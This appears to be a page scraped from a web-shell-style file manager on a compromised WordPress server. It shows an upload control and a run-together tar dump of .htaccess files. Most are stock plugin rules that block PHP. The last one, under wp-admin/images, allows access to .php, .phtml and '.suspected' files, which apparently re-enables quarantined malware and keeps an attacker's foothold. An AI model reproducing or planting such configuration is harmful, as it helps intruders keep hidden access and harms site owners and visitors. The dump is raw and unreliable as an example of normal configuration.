/
home
/
rekodeb
/
photobooth
/
-20260707214740
/
wp-admin
/
resources
/
v3
/
dbuv
/
Upload File
HOME
home/rekodeb/photobooth/wp-content/uploads/ast-block-templates-json/.htaccess 0000666 00000000015 15217057142 0023465 0 ustar 00 deny from all home/rekodeb/photobooth/wp-content/uploads/wpforms/.htaccess 0000666 00000001407 15217057214 0020346 0 ustar 00 # BEGIN WPForms # Les directives (lignes) entre « BEGIN WPForms » et « END WPForms » sont générées # dynamiquement, et doivent être modifiées uniquement via les filtres WordPress. # Toute modification des directives situées entre ces marqueurs sera surchargée. # Disable PHP and Python scripts parsing. <Files *> SetHandler none SetHandler default-handler RemoveHandler .cgi .php .php3 .php4 .php5 .phtml .pl .py .pyc .pyo RemoveType .cgi .php .php3 .php4 .php5 .phtml .pl .py .pyc .pyo </Files> <IfModule mod_php5.c> php_flag engine off </IfModule> <IfModule mod_php7.c> php_flag engine off </IfModule> <IfModule mod_php8.c> php_flag engine off </IfModule> <IfModule headers_module> Header set X-Robots-Tag "noindex" </IfModule> # END WPForms home/rekodeb/photobooth/wp-content/uploads/astra-sites/.htaccess 0000666 00000000015 15217061312 0021074 0 ustar 00 deny from all home/rekodeb/photobooth/wp-content/uploads/ai-builder/.htaccess 0000666 00000000015 15217061321 0020652 0 ustar 00 deny from all home/rekodeb/photobooth/wp-content/uploads/wpforms/cache/.htaccess 0000666 00000000676 15217067621 0021423 0 ustar 00 # BEGIN WPForms # The directives (lines) between "BEGIN WPForms" and "END WPForms" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. # Disable access for any file in the cache dir. # Apache 2.2 <IfModule !authz_core_module> Deny from all </IfModule> # Apache 2.4+ <IfModule authz_core_module> Require all denied </IfModule> # END WPForms home/rekodeb/parcforet/wp-admin/images/.htaccess 0000666 00000000544 15217106416 0015665 0 ustar 00 <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> <FilesMatch ".*\.(?i:phtml|php|suspected|PHP)$"> Order Allow,Deny Allow from all </FilesMatch>